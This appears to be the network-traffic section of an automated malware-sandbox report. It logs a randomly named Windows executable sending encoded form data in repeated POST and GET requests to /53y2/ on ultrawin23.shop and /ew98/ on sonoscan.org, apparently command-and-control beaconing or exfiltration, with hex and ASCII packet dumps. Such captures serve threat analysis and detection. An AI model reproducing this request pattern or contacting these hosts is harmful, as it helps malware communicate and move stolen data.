6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                              Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                              Nov 12, 2024 15:31:34.753319025 CET212INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                              Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
                                                              Nov 12, 2024 15:31:34.753336906 CET1236INData Raw: 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65
                                                              Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
                                                              Nov 12, 2024 15:31:34.753348112 CET1236INData Raw: 20 73 74 61 72 74 65 64 3f 20 4c 6f 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73
                                                              Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
                                                              Nov 12, 2024 15:31:34.753365993 CET424INData Raw: 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70
                                                              Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
                                                              Nov 12, 2024 15:31:34.753473043 CET1236INData Raw: 67 65 73 20 69 6e 63 6c 75 64 65 20 65 76 65 72 79 74 68 69 6e 67 20 79 6f 75 20 6e 65 65 64 20 74 6f 20 67 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20
                                                              Data Ascii: ges include everything you need to get started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_
                                                              Nov 12, 2024 15:31:34.753484011 CET242INData Raw: 3e 3c 62 72 20 2f 3e 0a 09 09 09 09 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75
                                                              Data Ascii: ><br /><p><a href="https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.749985170.39.213.43801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:31:40.265789032 CET616OUTPOST /53y2/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.ultrawin23.shop
                                                              Origin: http://www.ultrawin23.shop
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 218
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.ultrawin23.shop/53y2/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 67 39 68 79 30 71 79 32 66 52 52 74 46 2b 48 39 69 4f 63 54 30 78 64 59 74 35 74 6a 6c 5a 5a 42 31 4e 30 4d 63 52 62 37 6b 55 62 33 71 55 32 61 73 7a 34 63 6f 39 47 41 38 63 54 53 39 45 34 62 67 48 59 66 52 73 52 4b 54 30 52 68 6d 39 73 48 70 5a 79 79 67 68 52 65 61 53 53 43 4f 62 71 77 46 33 43 36 31 36 61 4e 55 4d 73 67 73 71 69 43 65 52 48 6c 66 46 4e 78 74 2f 79 4f 51 7a 30 34 48 39 58 73 6e 31 50 69 66 52 68 2b 51 4e 72 53 42 37 74 4e 71 4e 42 59 4e 55 44 43 66 78 33 7a 4d 77 4a 56 33 48 5a 66 41 6c 7a 5a 6f 72 62 70 33 57 31 73 67 6f 75 56 71 33 4d 43 44 73 48 55 48 4a 4a 35 38 4c 2b 6c 6e 4a 6a 31 54 49 4e 45 6b 67 3d 3d
                                                              Data Ascii: ZtwlQ=g9hy0qy2fRRtF+H9iOcT0xdYt5tjlZZB1N0McRb7kUb3qU2asz4co9GA8cTS9E4bgHYfRsRKT0Rhm9sHpZyyghReaSSCObqwF3C616aNUMsgsqiCeRHlfFNxt/yOQz04H9Xsn1PifRh+QNrSB7tNqNBYNUDCfx3zMwJV3HZfAlzZorbp3W1sgouVq3MCDsHUHJJ58L+lnJj1TINEkg==
                                                              Nov 12, 2024 15:31:40.860546112 CET907INHTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              content-type: text/html
                                                              content-length: 707
                                                              date: Tue, 12 Nov 2024 14:31:40 GMT
                                                              server: LiteSpeed
                                                              location: https://www.ultrawin23.shop/53y2/
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.749986170.39.213.43801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:31:42.807125092 CET636OUTPOST /53y2/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.ultrawin23.shop
                                                              Origin: http://www.ultrawin23.shop
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 238
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.ultrawin23.shop/53y2/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 67 39 68 79 30 71 79 32 66 52 52 74 47 66 33 39 75 4e 30 54 78 52 64 62 78 70 74 6a 2b 4a 5a 46 31 4e 6f 4d 63 55 72 52 6b 47 76 33 6b 57 2b 61 2b 6e 73 63 6d 64 47 41 6b 4d 53 57 7a 6b 34 53 67 48 63 70 52 73 39 4b 54 30 56 68 6d 34 49 48 70 75 47 39 67 78 52 59 44 43 53 45 42 37 71 77 46 33 43 36 31 36 65 6e 55 4b 45 67 74 61 53 43 59 31 62 6d 42 56 4e 32 73 2f 79 4f 55 7a 30 38 48 39 58 30 6e 33 37 49 66 55 39 2b 51 50 44 53 43 71 74 4f 2f 64 42 6b 43 30 43 2b 58 54 66 35 4c 78 6c 38 39 56 68 52 4e 6c 58 4a 6b 39 61 4c 74 30 35 41 2b 35 57 75 75 31 6f 30 55 4b 61 68 46 49 4e 68 78 70 4b 45 34 2b 47 66 65 61 73 41 79 54 6f 42 4a 74 55 6d 6d 49 39 64 39 34 77 2b 64 46 36 56 68 54 38 3d
                                                              Data Ascii: ZtwlQ=g9hy0qy2fRRtGf39uN0TxRdbxptj+JZF1NoMcUrRkGv3kW+a+nscmdGAkMSWzk4SgHcpRs9KT0Vhm4IHpuG9gxRYDCSEB7qwF3C616enUKEgtaSCY1bmBVN2s/yOUz08H9X0n37IfU9+QPDSCqtO/dBkC0C+XTf5Lxl89VhRNlXJk9aLt05A+5Wuu1o0UKahFINhxpKE4+GfeasAyToBJtUmmI9d94w+dF6VhT8=
                                                              Nov 12, 2024 15:31:43.391102076 CET907INHTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              content-type: text/html
                                                              content-length: 707
                                                              date: Tue, 12 Nov 2024 14:31:43 GMT
                                                              server: LiteSpeed
                                                              location: https://www.ultrawin23.shop/53y2/
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.749987170.39.213.43801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:31:45.357175112 CET1649OUTPOST /53y2/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.ultrawin23.shop
                                                              Origin: http://www.ultrawin23.shop
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 1250
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.ultrawin23.shop/53y2/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 67 39 68 79 30 71 79 32 66 52 52 74 47 66 33 39 75 4e 30 54 78 52 64 62 78 70 74 6a 2b 4a 5a 46 31 4e 6f 4d 63 55 72 52 6b 47 58 33 6b 6b 47 61 73 56 45 63 6c 64 47 41 36 63 53 62 7a 6b 35 51 67 44 34 31 52 73 42 38 54 32 64 68 70 2b 45 48 72 63 75 39 76 78 52 59 4d 69 53 46 4f 62 71 70 46 30 36 32 31 36 75 6e 55 4b 45 67 74 59 4b 43 50 78 48 6d 47 6c 4e 78 74 2f 79 43 51 7a 30 41 48 39 66 4b 6e 33 2f 79 65 6e 6c 2b 51 76 54 53 44 63 52 4f 69 74 42 63 4c 6b 43 6d 58 54 43 6a 4c 31 39 34 39 52 6f 45 4e 69 6a 4a 6e 6f 44 66 77 6e 46 44 38 66 2b 42 77 30 45 6f 62 34 4f 49 49 70 35 67 75 62 75 4e 35 4d 71 71 53 71 68 41 2b 56 70 65 64 63 77 4b 76 4c 70 64 78 34 56 32 4f 48 53 75 77 6b 49 5a 72 67 70 6d 73 63 36 47 64 39 4f 72 67 42 35 4a 4a 76 4a 4e 48 36 6d 43 59 36 72 52 66 63 32 6e 4c 66 31 79 35 43 48 76 58 63 61 32 4e 56 62 79 4d 53 52 35 56 4a 37 76 74 61 36 4f 54 4f 46 61 41 63 47 6c 45 6c 67 71 6c 2b 6c 4e 76 37 37 36 46 79 74 70 57 68 79 35 6e 5a 30 65 78 32 48 36 73 37 2b 73 [TRUNCATED]
                                                              Data Ascii: ZtwlQ=g9hy0qy2fRRtGf39uN0TxRdbxptj+JZF1NoMcUrRkGX3kkGasVEcldGA6cSbzk5QgD41RsB8T2dhp+EHrcu9vxRYMiSFObqpF06216unUKEgtYKCPxHmGlNxt/yCQz0AH9fKn3/yenl+QvTSDcROitBcLkCmXTCjL1949RoENijJnoDfwnFD8f+Bw0Eob4OIIp5gubuN5MqqSqhA+VpedcwKvLpdx4V2OHSuwkIZrgpmsc6Gd9OrgB5JJvJNH6mCY6rRfc2nLf1y5CHvXca2NVbyMSR5VJ7vta6OTOFaAcGlElgql+lNv776FytpWhy5nZ0ex2H6s7+svZLn7DmyXvMmd3aLA5/VHurovv4F/sD9I16Yzn8aPr1PqGrXy01bWU9d9SVQVm569oxo1ZJ/W/8KewfotlaIf6E7bGsJgh7xF6SDMGAnQD7SV2I3w8RzxmUDU41oaVVrGh5hDzGr+wOdG5gTtsZ/mahc+e2IrUqY1QkZhVu581IKxPqWLridiLd3HB9bfWZ6l4GpR1FirIW7l8fYIUqVlBYaPqKTVN5MJqlyoJg4/MYpOIINVMbhugTisUDvy79qxdWWm0kTSAJzJeMy/mud19QxGulBlViLLAevibTGU5AbfYH+EID06EWp5RJyv4GcxhsknSGyaPiKccpsmrC9boIHxZ7xJtyS+j/rWezY9bHdmUVYZmMaPk+pgsLUU6JUfqQbMZhyzy0U2MbOaHmsvaCAXMh2iehGry7xzwzjYlMGwTK66UKI/DN96lkm3M/LStQJPH2UbfPAf4pq9Tof2Ld0Wn4L0LA2IzcoYl1AhEbSmTr5CQRWBYBaC9FcBGocRCyHVHdQwVamg6dZA4df4GZhxgo7kAmmPxt04oLL9S/8DsC1OFO/91M+25AMExqsS86Z0TFPlLM15rXbsVJDUnV1DC7pp3b1H98m33sUBUcmhk+bAbRk6B4l9NVXpOU9d6P+99AO9+mSG4NY7gByeRsPhzkdVgzTAO [TRUNCATED]
                                                              Nov 12, 2024 15:31:45.950088978 CET907INHTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              content-type: text/html
                                                              content-length: 707
                                                              date: Tue, 12 Nov 2024 14:31:45 GMT
                                                              server: LiteSpeed
                                                              location: https://www.ultrawin23.shop/53y2/
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.749988170.39.213.43801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:31:47.998218060 CET343OUTGET /53y2/?ZtwlQ=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6ylAR+OjeKP5reZGyzx4OrXvFvuqWHYyr9YQxhjYSLaT0UH6C6o1S+flVa&ZX=G2OXK HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Host: www.ultrawin23.shop
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:31:48.571270943 CET1063INHTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              content-type: text/html
                                                              content-length: 707
                                                              date: Tue, 12 Nov 2024 14:31:48 GMT
                                                              server: LiteSpeed
                                                              location: https://www.ultrawin23.shop/53y2/?ZtwlQ=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6ylAR+OjeKP5reZGyzx4OrXvFvuqWHYyr9YQxhjYSLaT0UH6C6o1S+flVa&ZX=G2OXK
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.74998913.248.169.48801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:31:53.622720957 CET607OUTPOST /ew98/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.sonoscan.org
                                                              Origin: http://www.sonoscan.org
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 218
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.sonoscan.org/ew98/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 4f 54 42 63 70 6a 72 36 36 52 39 59 61 43 6a 30 66 4a 4e 72 66 58 4f 71 79 46 7a 70 58 75 35 66 6c 30 34 79 38 36 78 56 51 72 6a 64 39 49 36 6b 5a 6c 55 6b 44 78 6d 6d 2f 37 36 56 73 70 41 78 63 48 54 4e 47 67 73 65 7a 63 4a 46 4b 50 6c 4a 61 4e 6f 58 37 78 69 67 58 74 59 6c 6b 77 66 75 78 45 65 6d 74 68 66 6b 44 42 65 73 79 67 47 65 37 45 46 36 78 2b 4c 32 35 4d 7a 32 45 47 39 35 35 6f 7a 5a 78 37 6d 2b 4e 6d 5a 64 51 57 58 6d 4d 51 32 76 63 32 79 56 68 2b 35 48 38 55 67 30 76 46 6f 57 46 7a 43 46 43 72 62 35 57 30 2f 4f 2b 30 71 4f 71 39 55 46 49 5a 47 5a 47 61 6e 76 4b 34 65 51 57 6b 63 6e 41 56 65 54 72 31 45 51 35 51 3d 3d
                                                              Data Ascii: ZtwlQ=OTBcpjr66R9YaCj0fJNrfXOqyFzpXu5fl04y86xVQrjd9I6kZlUkDxmm/76VspAxcHTNGgsezcJFKPlJaNoX7xigXtYlkwfuxEemthfkDBesygGe7EF6x+L25Mz2EG955ozZx7m+NmZdQWXmMQ2vc2yVh+5H8Ug0vFoWFzCFCrb5W0/O+0qOq9UFIZGZGanvK4eQWkcnAVeTr1EQ5Q==


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.74999013.248.169.48801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:31:56.172172070 CET627OUTPOST /ew98/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.sonoscan.org
                                                              Origin: http://www.sonoscan.org
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 238
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.sonoscan.org/ew98/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
